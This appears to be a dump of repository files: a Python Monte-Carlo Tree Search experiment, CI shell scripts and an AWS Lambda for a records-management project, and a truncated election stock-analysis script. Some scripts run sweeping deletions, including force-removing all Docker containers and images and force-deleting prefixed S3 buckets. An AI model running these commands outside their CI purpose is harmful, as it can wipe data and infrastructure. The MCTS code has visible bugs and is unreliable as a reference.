"alphanum_fraction": 0.6280937194824219,
"avg_line_length": 37.3636360168457,
"blob_id": "02a81817cb3c6c1c5af04d44a6ef81f4fe08a385",
"content_id": "4e323dad0a1ef1a7b636f873703c1a2562939f5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7596,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 198,
"path": "/mcts.py",
"repo_name": "promach/mcts",
"src_encoding": "UTF-8",
"text": "import random\nimport numpy as np\nfrom Net import Net\nimport play\n\nimport sys\nsys.setrecursionlimit(100000) # to temporarily solve Recursion Depth Limit issue\n\n# Reference :\n# https://www.reddit.com/r/learnmachinelearning/comments/fmx3kv/empirical_example_of_mcts_calculation_puct_formula/\n\n# PUCT formula : https://colab.research.google.com/drive/14v45o1xbfrBz0sG3mHbqFtYz_IrQHLTg#scrollTo=1VeRCpCSaHe3\n\n# https://en.wikipedia.org/wiki/Monte_Carlo_tree_search#Exploration_and_exploitation\ncfg_puct = np.sqrt(2) # to balance between exploitation and exploration\npuct_array = [] # stores puct ratio for every child nodes for argmax()\n\n\n# determined by PUCT formula\ndef find_best_path(parent):\n print(\"find_best_path()\")\n if len(parent.nodes) == 0:\n return 0\n\n for N in parent.nodes:\n puct_array.append(N.puct)\n\n max_index = np.argmax(puct_array)\n puct_array.clear() # resets the list so that other paths could reuse it\n\n # leaf node has 0 child node\n is_leaf_node = (len(parent.nodes[max_index].nodes) == 0)\n if is_leaf_node:\n return max_index\n\n else:\n return -1\n\n\n# for play.py inference coding\nis_simulation_stage = None # initialized to None because game had not started yet\n\n\ndef is_mcts_in_simulate_stage():\n return is_simulation_stage\n\n\nclass Mcts:\n def __init__(self, parent):\n # https://www.tutorialspoint.com/python_data_structure/python_tree_traversal_algorithms.htm\n # https://www.geeksforgeeks.org/sum-parent-nodes-child-node-x/\n\n self.parent = parent # this is the parent node\n self.nodes = [] # creates an empty list with no child nodes initially\n # self.data = 0 # can be of any value, but just initialized to 0\n self.visit = 1 # when a node is first created, it is counted as visited once\n self.win = 0 # because no play/simulation had been performed yet\n self.loss = 0 # because no play/simulation had been performed yet\n self.puct = 0 # initialized to 0 because game had not started yet\n\n # this function computes W/N ratio for each node\n def compute_total_win_and_visits(self, total_win=0, visits=0):\n print(\"compute_total_win_and_visits()\")\n\n if self.win:\n total_win = total_win + 1\n\n if self.visit:\n visits = visits + 1\n\n if self.nodes: # if there is/are child node(s)\n for n in self.nodes: # traverse down the entire branch for each child node\n n.compute_total_win_and_visits(total_win, visits)\n\n return total_win, visits # same order (W/N) as in\n # https://i.imgur.com/uI7NRcT.png inside each node\n\n # Selection stage of MCTS\n # https://www.reddit.com/r/reinforcementlearning/comments/kfg6qo/selection_phase_of_montecarlo_tree_search/\n def select(self):\n print(\"select()\")\n print(\"start printing tree for debugging purpose\")\n self.print_tree()\n print(\"finished printing tree\")\n # traverse recursively all the way down from the root node\n # to find the path with the highest W/N ratio (this ratio is determined using PUCT formula)\n # and then select that leaf node to do the new child nodes insertion\n leaf = find_best_path(self) # returns a reference pointer to the desired leaf node\n parent_node = self\n\n while leaf == -1:\n parent_node = parent_node.nodes\n leaf = find_best_path(parent_node) # keeps looping in case it is not the leaf yet\n\n parent_node.insert() # this leaf node is selected to insert child nodes under it\n\n # Expansion stage of MCTS\n # Insert Child Nodes for a leaf node\n def insert(self):\n print(\"insert()\")\n # assuming that we are playing tic-tac toe\n # we subtract number of game states already played from the total possible game states\n num_of_possible_game_states = play.TOTAL_NUM__OF_BOXES - play.num_of_play_rounds\n\n for S in range(num_of_possible_game_states):\n self.nodes.append(Mcts(self)) # inserts child nodes\n\n # selects randomly just 1 newly added child node and simulate it\n random_child_under_best_parent_node = random.randint(0, num_of_possible_game_states-1)\n self.nodes[random_child_under_best_parent_node].simulate(random_child_under_best_parent_node)\n\n # Simulation stage of MCTS\n def simulate(self, random_child_under_best_parent_node):\n print(\"simulate()\")\n # best_child_node = find_best_path(self)\n\n # Instantiates neural network inference coding (play.py) here\n game_status = play.mcts_play(is_mcts_in_simulate_stage=1, ongoing_game=play.game_is_on,\n best_child_node=random_child_under_best_parent_node)\n # print(\"after one round of game\")\n\n if game_status != play.NO_WINNING_PLAYER_YET:\n print(\"game finally finished, exiting mcts tree logic\")\n exit(0)\n\n if play.game_is_on == 1: # game not yet finished\n # predicted \"intermediate\" score during each step of the game,\n # so it is either win (1) or draw (0) or lose (-1)\n print(\"intermediate out_score = \", play.out_score)\n\n if play.out_score == 1:\n print(\"win\")\n self.win = 1\n self.loss = 0\n\n if play.out_score == -1:\n print(\"lose\")\n self.win = 0\n self.loss = 1\n\n if play.out_score == 0:\n print(\"draw\")\n self.win = 0\n self.loss = 0\n\n self.backpropagation(self.win, self.loss)\n\n else: # game finished\n print(root.print_tree()) # for verifying MCTS logic correctness\n\n # Backpropagation stage of MCTS\n def backpropagation(self, win, loss):\n print(\"backpropagation()\")\n # traverses upwards to the root node\n # and updates PUCT ratio for each parent nodes\n # computes the PUCT expression Q+U https://slides.com/crem/lc0#/9\n\n if self.parent == 0:\n num_of_parent_visits = 0\n else:\n num_of_parent_visits = self.parent.visit\n\n total_win_for_all_child_nodes, num_of_child_visits = self.compute_total_win_and_visits(0, 0)\n\n self.visit = num_of_child_visits\n\n # traverses downwards all branches (only for those branches involved in previous play/simulation)\n # and updates PUCT values for all their child nodes\n self.puct = (total_win_for_all_child_nodes / num_of_child_visits) + \\\n cfg_puct * np.sqrt(num_of_parent_visits) / (num_of_child_visits + 1)\n\n if self.parent == 0: # already reached root node\n self.select()\n\n else:\n self.parent.visit = self.parent.visit + 1\n if win:\n if self.parent.parent: # grandparent node (same-coloured player) exists\n self.parent.parent.win = self.parent.parent.win + 1\n\n if (win == 0) & (loss == 0): # tie is between loss (0) and win (1)\n self.parent.win = self.parent.win + 0.5 # parent node (opponent player)\n\n if self.parent.parent: # grandparent node (same-coloured player) exists\n self.parent.parent.win = self.parent.parent.win + 0.5\n\n self.parent.backpropagation(win, loss)\n\n # Print the Tree\n def print_tree(self):\n for x in self.nodes:\n print(x.puct)\n if x.nodes:\n self.print_tree()\n\n\nroot = Mcts(0) # we use parent=0 because this is the head/root node\nroot.select()\n"
},
{
"alpha_fraction": 0.746997594833374,
"alphanum_fraction": 0.7814251184463501,
"avg_line_length": 103.08333587646484,
"blob_id": "9e038b08d7c7c9cdd07f7a29f9dd376e9966bc86",
"content_id": "0f6c69761c0877ee84b03e337d3b4b09bc3d595d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1251,
"license_type": "no_license",
"max_line_length": 529,
"num_lines": 12,
"path": "/README.md",
"repo_name": "promach/mcts",
"src_encoding": "UTF-8",
"text": "# mcts\nA simple vanilla Monte-Carlo Tree Search implementation in python \n\nTODO : \n\n1. The MCTS logic is now using neural network as its simulation (evaluation or rollout function) backbone engine, will consider to use Deep Q-learning method later\n\n2. Investigate the [PUCT formula](https://slides.com/crem/lc0#/9) more in-depth especially [Hoeffding’s Inequality](https://lilianweng.github.io/lil-log/2018/01/23/the-multi-armed-bandit-problem-and-its-solutions.html#hoeffdings-inequality) and its [weakness](https://hal.archives-ouvertes.fr/hal-00747575v4/document#page=27). Study the performance quality of exploration/exploitation solved by PUCT which is mathematically represented by [Regret analysis](https://tor-lattimore.com/downloads/talks/2018/trieste/tr1.pdf#page=18)\n\n3. Review the BAI-MCTS paper : [Monte-Carlo Tree Search by Best Arm Identification](https://arxiv.org/abs/1706.02986) , and [Adversarial Bandit Environments](https://tor-lattimore.com/downloads/book/book.pdf#page=156) \n\nCredit: Thanks to kind folks ([@crem](https://github.com/mooskagh) , [@Naphthalin](https://github.com/Naphthalin) , [@oscardssmith](https://github.com/oscardssmith)) from Leela-Zero community , and [@Lattimore](https://github.com/tor) from DeepMind\n"
}
] | 4 |
mapimienta/records-management | https://github.com/mapimienta/records-management | ecea881d0bb62468d7574059cf3e6858b306f1b9 | 02f396f9774c9a94bf30152c7243a3eda3bb7bab | 026398ce908e3873c0bc864b7b024499f41186d8 | refs/heads/master | 2023-01-05T14:38:34.660797 | 2020-10-27T14:17:24 | 2020-10-27T14:17:24 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5048010945320129,
"alphanum_fraction": 0.5253772139549255,
"avg_line_length": 33.761905670166016,
"blob_id": "1b7411a1c03a57e549a7fbf750991eeef62af0f2",
"content_id": "d7993ad92f936486efaac017864340720dd225ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 729,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 21,
"path": "/scripts/cleanup.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\necho \"=========================== Starting Cleanup Script ===========================\"\nPS4=\"\\[\\e[35m\\]+ \\[\\e[m\\]\"\nset -vx\npushd \"$(dirname \"${BASH_SOURCE[0]}\")/../\"\n\n\n# Stop and remove the containers\ndocker ps -a -q | xargs -l -r docker stop\ndocker ps -a -q | xargs -l -r docker rm\n\npip install awscli\nprintf \"${CREATE_BUCKET_AWS_ACCESS_KEY}\\n${CREATE_BUCKET_AWS_SECRET_KEY}\\n\\n\\n\" | aws configure\n\naws s3 ls | awk '{print $3}' | grep \"^${S3_BUCKET_NAME}\" | xargs -l -r -I{} aws s3 rb \"s3://{}\" --force\naws s3 ls | awk '{print $3}' | grep \"^${S3_BUCKET2_NAME}\" | xargs -l -r -I{} aws s3 rb \"s3://{}\" --force\n\npopd\nset +vx\necho \"=========================== Finishing Cleanup Script ==========================\""
},
{
"alpha_fraction": 0.7251265048980713,
"alphanum_fraction": 0.7251265048980713,
"avg_line_length": 36.0625,
"blob_id": "efd2ceb0882ef7b044385f445c426bd2a260c911",
"content_id": "85576d3ad1e9dabe947e4d6b3ec3a662881c3d6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 16,
"path": "/scripts/source_clear.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n# fail script immediately on any errors in external commands and print the lines\nset -ev\n\nmvn -B -q clean install \\\n -DskipTests \\\n -Dmaven.javadoc.skip=true \\\n -pl '!rm-automation,!rm-automation/rm-automation-community-rest-api,!rm-automation/rm-automation-enterprise-rest-api,!rm-automation/rm-automation-ui,!rm-benchmark' \\\n com.srcclr:srcclr-maven-plugin:scan \\\n -Dcom.srcclr.apiToken=$SRCCLR_API_TOKEN > scan.log\n\nSUCCESS=$? # this will read exit code of the previous command\n\ncat scan.log | grep -e 'Full Report Details' -e 'Failed'\n\nexit ${SUCCESS}\n"
},
{
"alpha_fraction": 0.6707530617713928,
"alphanum_fraction": 0.6725043654441833,
"avg_line_length": 29.052631378173828,
"blob_id": "18703f701134779004a8fd3fd1eaf8b73fb2a405",
"content_id": "8d58cfdc0266e1a1eecbea3c7670baeea53639cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 19,
"path": "/scripts/cleanImages.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nset -x\n\necho $imagesToBeDeleted\necho \"List all images:\"\ndocker images -a\n\ndocker_images_list=$(docker images | grep $imagesToBeDeleted | awk '{print $3}' | uniq)\nif [ \"$docker_images_list\" == \"\" ]; then\n echo \"No docker images on the agent\"\nelse\n echo \"Clearing images: $docker_images_list\"\n if docker rmi -f $docker_images_list ; then\n echo \"Deleting images was successful.\"\n else\n echo \"Deleting specified images failed, so falling back to delete ALL images on system.\"\n docker rmi -f $(docker images -aq)\n fi\nfi\n"
},
{
"alpha_fraction": 0.6617250442504883,
"alphanum_fraction": 0.664420485496521,
"avg_line_length": 31.2608699798584,
"blob_id": "4d980f917fe681374c8e438127f809f21d7a7021",
"content_id": "384131f1ee098143627152981982f62c4f9f845a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 742,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 23,
"path": "/scripts/setUpMavenPhase.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\necho \"Branch name: ${TRAVIS_BRANCH}\"\necho \"Pull request: ${TRAVIS_PULL_REQUEST}\"\necho \"Travis job name: ${TRAVIS_JOB_NAME}\"\necho \"Image tag: ${TRAVIS_BRANCH:8}\"\n\nif [[ ${TRAVIS_JOB_NAME} == \"Build AGS Enterprise\" ]] ; then\n export BUILD_PROFILE=\"internal\"\nelse\n export BUILD_PROFILE=\"master\"\nfi\n\nif [[ \"${TRAVIS_BRANCH}\" == \"master\" && \"${TRAVIS_PULL_REQUEST}\" == \"false\" ]] ; then\n export MAVEN_PHASE=\"deploy\"\n export IMAGE_TAG=\"latest\"\nelif [[ ${TRAVIS_BRANCH} = release* && \"${TRAVIS_PULL_REQUEST}\" == \"false\" ]] ; then\n export MAVEN_PHASE=\"deploy\"\n export IMAGE_TAG=\"${TRAVIS_BRANCH:8}-latest\"\nelse\n export MAVEN_PHASE=\"verify\"\n export BUILD_PROFILE=\"buildDockerImage\"\n export IMAGE_TAG=\"latest\"\nfi\n"
},
{
"alpha_fraction": 0.6649484634399414,
"alphanum_fraction": 0.6694587469100952,
"avg_line_length": 28.561904907226562,
"blob_id": "4e5e791811fe3c3b85b1e2d375f391d35c57cd3b",
"content_id": "974f1bb2208147772cb2981a936225a4f125260e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3104,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 105,
"path": "/scripts/delete-test-buckets-lambda.py",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "import json\nimport boto3\nfrom datetime import datetime, timedelta, timezone\nfrom botocore.exceptions import ClientError\n\n\n# This python module is intended for use as a Python 3 AWS lambda function\n# Tested in python 3.6 environment\n# The AWS role used with this lambda function will need AmazonS3FullAccess and CloudWatchLogsFullAccess permissions\n# Tested with role lambda_s3_execution_role in engineering account\n\n# Retrieve bucket's tag set\ndef get_tagset(bucket):\n try:\n return bucket.Tagging().tag_set\n except ClientError as e:\n return []\n\n# Check if a bucket should be deleted\ndef tag_matches(bucket):\n for tag in get_tagset(bucket):\n if tag[\"Key\"] == \"toDeleteAfterTests\" and tag[\"Value\"] == \"true\" :\n return True\n return False\n\ndef age_matches(bucket):\n delta = datetime.now(timezone.utc) - bucket.creation_date\n return delta.days > 0\n\ndef prefix_matches(bucket, prefix):\n if not prefix:\n return True\n if bucket.name.startswith(prefix):\n return True\n return False\n\n# Get a list of buckets to delete\ndef get_buckets_to_delete(prefix):\n s3 = boto3.resource('s3')\n\n # Get all buckets matching bucket name prefix\n prefixed_buckets = [bucket for bucket in s3.buckets.all() if prefix_matches(bucket, prefix)]\n\n # Filter buckets on tag\n # tagged_buckets = [bucket for bucket in prefixed_buckets if tag_matches(bucket)]\n\n # Filter buckets on age\n old_buckets = [bucket for bucket in prefixed_buckets if age_matches(bucket)]\n\n return old_buckets\n\n# Delete bucket\ndef delete_bucket(bucket):\n try:\n [object.delete for object in bucket.objects.all()]\n except ClientError as e:\n print(\"Failed to delete objects in bucket: \" + bucket.name)\n print(e)\n try:\n bucket.objects.all().delete()\n except ClientError as e:\n print(\"Failed to delete objects in bucket: \" + bucket.name)\n print(e)\n\n try:\n [version.delete() for version in bucket.object_versions.all()]\n except ClientError as e:\n print(\"Failed to delete object_versions in bucket: \" + bucket.name)\n print(e)\n try:\n bucket.object_versions.delete()\n except ClientError as e:\n print(\"Failed to delete object_versions in bucket: \" + bucket.name)\n print(e)\n\n try:\n bucket.delete()\n print(\"Bucket \" + bucket.name + \" was deleted\")\n except ClientError as e:\n print(\"Failed to delete bucket: \" + bucket.name)\n print(e)\n\n\n# Non-empty buckets are deleted (recursively); failed attempts will be logged.\n# The buckets are filtered on the name prefix: \"travis-ags-worm-\"\ndef lambda_handler(event, context):\n\n # Retrieve bucket name prefix option\n prefix = \"travis-ags-\"\n\n # Get a list of buckets to delete\n buckets_to_delete = get_buckets_to_delete(prefix)\n\n # Delete buckets\n print (\"Deleting buckets:\")\n for bucket in buckets_to_delete :\n print (bucket.name)\n delete_bucket(bucket)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps('Done!')\n }\n\n#lambda_handler(None, None)\n"
},
{
"alpha_fraction": 0.6395722031593323,
"alphanum_fraction": 0.6711229681968689,
"avg_line_length": 70.92308044433594,
"blob_id": "c1d03b2d43579ce30671a5de6206fc1b1b11c6bc",
"content_id": "57050588ed2aee5d1ddbe0da19a6a7815953f870",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1870,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 26,
"path": "/scripts/dockerLimitMemory.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\nset -x\n\n# Display containers resources usage before limitation\ndocker stats --no-stream\n\n#limit memory used by each container\ndocker update --memory=2Gb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_alfresco_' | awk '{print $1}')\ndocker update --memory=1200Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_search_' | awk '{print $1}')\n#docker update --memory=1Gb --memory-swap -1 $(docker ps -a | grep '_zeppelin_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_postgres_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_transform-router_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_imagemagick_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_alfresco-pdf-renderer_' | awk '{print $1}')\ndocker update --memory=300Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_shared-file-store_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_tika_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_libreoffice_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_activemq_' | awk '{print $1}')\ndocker update --memory=512Mb --memory-swap -1 --restart on-failure $(docker ps -a | grep '_transform-misc_' | awk '{print $1}')\n\n#stop not needed containers\ndocker stop $(docker ps -a | grep '_zeppelin_' | awk '{print $1}')\ndocker stop $(docker ps -a | grep '_sync-service_' | awk '{print $1}')\n\n# Display containers resources usage after limitation\ndocker stats --no-stream\n"
},
{
"alpha_fraction": 0.5895061492919922,
"alphanum_fraction": 0.6121399402618408,
"avg_line_length": 36.38461685180664,
"blob_id": "d943cbc8a88a69438055520dbaa1f8ab893f490e",
"content_id": "a3ff254ad636abd2c461805a0d44f01befb3dbb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 972,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 26,
"path": "/scripts/create-worm-bucket.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\necho \"=========================== Create Worm Bucket ===========================\"\nPS4=\"\\[\\e[35m\\]+ \\[\\e[m\\]\"\nset -vex\npushd \"$(dirname \"${BASH_SOURCE[0]}\")/../\"\n\npip install awscli\nprintf \"${CREATE_BUCKET_AWS_ACCESS_KEY}\\n${CREATE_BUCKET_AWS_SECRET_KEY}\\n\\n\\n\" | aws configure\n\nif aws s3 ls | awk '{print $3}' | grep -q \"^${S3_BUCKET2_NAME}$\" ; then\n echo \"Bucket ${S3_BUCKET2_NAME} already exists\"\n exit 0\nfi\n\naws s3api create-bucket --bucket \"${S3_BUCKET2_NAME}\" --region ${S3_BUCKET_REGION} --object-lock-enabled-for-bucket\naws s3api put-object-lock-configuration \\\n --bucket \"${S3_BUCKET2_NAME}\" \\\n --object-lock-configuration 'ObjectLockEnabled=Enabled,Rule={DefaultRetention={Mode=COMPLIANCE,Days=1}}'\n\naws s3api put-bucket-tagging --bucket \"${S3_BUCKET2_NAME}\" \\\n --tagging=\"TagSet=[{Key=toDeleteAfterTests,Value=true}]\"\n\npopd\nset +vex\necho \"=========================== Finishing Create Worm Bucket Script ==========================\"\n"
},
{
"alpha_fraction": 0.7445255517959595,
"alphanum_fraction": 0.7518247961997986,
"avg_line_length": 21.83333396911621,
"blob_id": "01a26e7fb11de7cbb49798f8f89decac54adbc23",
"content_id": "4143c742d2dd3abc84b38b829a69ef7767026b70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 6,
"path": "/scripts/startAlfresco.sh",
"repo_name": "mapimienta/records-management",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n# fail script immediately on any errors in external commands and print the lines\nset -ev\n\ncd $1\ndocker-compose up -d\n"
}
] | 8 |
gambler1541/book-mark | https://github.com/gambler1541/book-mark | 688c54e5a3ac50fce4553171bb9261d3f250a90b | 173522df346a84791b55d931bf027247739d9b08 | fe2f8c79e7e57cc98c39750cb881c9cb787cfbf9 | refs/heads/master | 2020-07-07T08:11:30.373447 | 2019-08-29T06:38:40 | 2019-08-29T06:38:40 | 203,299,960 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6973415017127991,
"alphanum_fraction": 0.6973415017127991,
"avg_line_length": 39.83333206176758,
"blob_id": "527aa280336af8a864c83ba4959b9daa2d840974",
"content_id": "21ea304dc1b0932dc2cf28f015894fd1c04b6a6a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 489,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 12,
"path": "/app/bookmark/urls.py",
"repo_name": "gambler1541/book-mark",
"src_encoding": "UTF-8",
"text": "from django.urls import path\n\nfrom .views import BookmarkListView, BookmarkCreateView, BookmarkDetail, BookmarkUpdate, BookmarkDeleteView\n\nurlpatterns = [\n path('', BookmarkListView.as_view(), name='list'),\n path('add/', BookmarkCreateView.as_view(), name='add'),\n path('detail/<int:pk>/', BookmarkDetail.as_view(), name='detail'),\n path('update/<int:pk>/', BookmarkUpdate.as_view(), name='update'),\n path('delete/<int:pk>/', BookmarkDeleteView.as_view(), name='delete'),\n\n]"
},
{
"alpha_fraction": 0.6624390482902527,
"alphanum_fraction": 0.6634146571159363,
"avg_line_length": 23.926828384399414,
"blob_id": "5a3545663b7cc0f97d686d99c9dcad82c20ca282",
"content_id": "8bfb3c9c08c75645d76a9a98c123dcb1280547ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 41,
"path": "/app/bookmark/views.py",
"repo_name": "gambler1541/book-mark",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView\n\nfrom .models import Bookmark\n\nclass BookmarkListView(ListView):\n # html에서 object라는 변수명으로 사용\n model = Bookmark\n # 한 페이지에 나올 개수\n paginate_by = 6\n\nclass BookmarkCreateView(CreateView):\n model = Bookmark\n # 입력 받을 필드\n fields = ['site_name',\n 'url',\n ]\n # 글쓰기를 완료하고 이동할 페이지\n # 보통 상세페이지로 이동\n success_url = reverse_lazy('list')\n # 기본적으로 설정되어 잇는 템플릿 이름들은 모델명_xxx의 형태\n # CreateView와 UpdateView는 form이 접미사인데 이걸 변경해서 bookmark_create라는 이름의 템플릿 파일을 사용하도록 설정\n template_name_suffix = '_create'\n\n\nclass BookmarkDetail(DetailView):\n model = Bookmark\n\n\nclass BookmarkUpdate(UpdateView):\n model = Bookmark\n fields = ['site_name',\n 'url',\n ]\n template_name_suffix = '_update'\n\n\nclass BookmarkDeleteView(DeleteView):\n model = Bookmark\n success_url = reverse_lazy('list')\n\n\n\n"
}
] | 2 |
ryanakuhl/Election-Market-Analysis | https://github.com/ryanakuhl/Election-Market-Analysis | 303f5f32e2907c610c4725b71a5dc58a028cbf73 | 49db0df67eb8044d122273fb337262c8d6414652 | 0f61dcf3bd687a62db0ae0bb4729e941c637fa2f | refs/heads/master | 2020-05-30T09:01:52.903635 | 2019-08-19T13:50:39 | 2019-08-19T13:50:39 | 189,631,482 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7627118825912476,
"alphanum_fraction": 0.7796609997749329,
"avg_line_length": 235,
"blob_id": "6deecb975aa258c2b140561bc9282dc3e2a3751f",
"content_id": "2df9174045acc3e6b15f4f456538bbafd3dec140",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 236,
"license_type": "no_license",
"max_line_length": 235,
"num_lines": 1,
"path": "/README.md",
"repo_name": "ryanakuhl/Election-Market-Analysis",
"src_encoding": "UTF-8",
"text": "Crunches data from election.csv and returns stock data from 1990 and onwards based on market closed divided by market open for the four main US markets - S&P(SPY), Nasdaq Composite (NASDAQ), NY Stock Exchange(NYSE), and Dow Jones(DOW).\n"
},
{
"alpha_fraction": 0.5700670480728149,
"alphanum_fraction": 0.5901759266853333,
"avg_line_length": 40.872806549072266,
"blob_id": "f9ec990d255de638bd137aa844208fcc4ed46e11",
"content_id": "d30d534b8155f7fe0e624e61511fe5971820642a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9548,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 228,
"path": "/main.py",
"repo_name": "ryanakuhl/Election-Market-Analysis",
"src_encoding": "UTF-8",
"text": "import os\nimport csv\nimport time, random\nimport datetime\nfrom datetime import timedelta\nimport xlsxwriter\nimport iexfinance\nfrom iexfinance import Stock\nimport pandas as pd\nimport pandas_datareader as pdr\nfrom datetime import datetime\nfrom datetime import timedelta\n\n\nelection_dict = {}\nelection_years = []\nall_yahoo_data = {}\nstock_symbols = ['SPY', 'NASDAQ', 'NYSE', 'DOW']\n\n\ndef write_to_formatted_excel():\n row = 0\n df1 = pd.DataFrame(columns=['SPY', 'NASDAQ', 'NYSE', 'DOW'])\n data = {'SPY': [0, 0, 0, 0, 0],\n 'NASDAQ': [0, 0, 0, 0, 0],\n 'NYSE': [0, 0, 0, 0, 0],\n 'DOW': [0, 0, 0, 0, 0],\n }\n df3 = pd.DataFrame(data)\n writer_object = pd.ExcelWriter('pandas_line_chart.xlsx', engine='xlsxwriter')\n df1.to_excel(writer_object, sheet_name='PercentChange')\n df1.to_excel(writer_object, sheet_name='ElectionData')\n df3.to_excel(writer_object, sheet_name='AverageChange')\n workbook_object = writer_object.book\n second_sheet = writer_object.sheets['ElectionData']\n second_sheet.set_column('A:E', 20)\n\n times_added = 0\n for i in range(1,len(lets_process.presidents)):\n second_sheet.write(row, 0, \"Election Number\")\n second_sheet.write(row, 1, \"House Dem\")\n second_sheet.write(row, 2, \"House Rep\")\n second_sheet.write(row, 3, \"Senate Dem\")\n second_sheet.write(row, 4, \"Senate Rep\")\n row += 1\n second_sheet.write(row, 0, lets_process.this_year[i])\n row += 1\n second_sheet.write(row, 0, lets_process.presidents[i])\n second_sheet.write(row, 1, lets_process.house_dems[i])\n second_sheet.write(row, 2, lets_process.house_repubs[i])\n second_sheet.write(row, 3, lets_process.senate_dems[i])\n second_sheet.write(row, 4, lets_process.senate_repubs[i])\n row += 1\n if lets_process.house_held[i] < 1.00:\n second_sheet.write(row, 1, 'Republican Majority')\n second_sheet.write(row, 2, (1 - lets_process.house_repubs[i] / lets_process.house_dems[i]) * -100)\n else:\n second_sheet.write(row, 1, 'Democrat Majority')\n second_sheet.write(row, 2, (1 - lets_process.house_dems[i] / lets_process.house_repubs[i]) * -100)\n if lets_process.senate_held[i] < 1.00:\n second_sheet.write(row, 3, 'Republican Majority')\n second_sheet.write(row, 4, (1 - lets_process.senate_repubs[i] / lets_process.senate_dems[i]) * -100)\n else:\n second_sheet.write(row, 3, 'Democrat Majority')\n second_sheet.write(row, 4, (1 - lets_process.senate_dems[i] / lets_process.senate_repubs[i]) * -100)\n row += 2\n df2 = pd.DataFrame(columns=['SPY', 'NASDAQ', 'NYSE', 'DOW'])\n stats = [lets_process.this_year[i] + '_' + s for s in stock_symbols if lets_process.this_year[i] + '_' + s in all_yahoo_data.keys()]\n for s in stats:\n single_stock = pd.DataFrame(all_yahoo_data.get(s).Close / all_yahoo_data.get(s).Open, columns=[s.split('_')[1]])\n df2[s.split('_')[1]] = single_stock[s.split('_')[1]]\n df3[getattr(df3, s.split('_')[1]).name] += single_stock[getattr(df3, s.split('_')[1]).name].values\n times_added += .25\n if df2.values.any():\n df1 = df1.append(df2)\n row = 0\n worksheet_object = writer_object.sheets['PercentChange']\n worksheet_object.set_column('A:E', 20)\n df1.to_excel(writer_object, sheet_name='PercentChange', startrow=row)\n worksheet_object = writer_object.sheets['AverageChange']\n df3 = df3 / times_added\n df3.to_excel(writer_object, sheet_name='AverageChange', startrow=row)\n chart_object = workbook_object.add_chart({'type': 'line'})\n newlist = [round(float(x), 3) for x in list(df3['SPY'])]\n newlist.insert(0, 'AverageChange')\n chart_object.add_series({\n 'name': '=AverageChange!$B$1',\n 'categories': '=AverageChange!$A$2:$A$6',\n 'values': '=AverageChange!$B$2:$B$6',\n })\n chart_object.add_series({\n 'name': '=AverageChange!$C$1',\n 'categories': 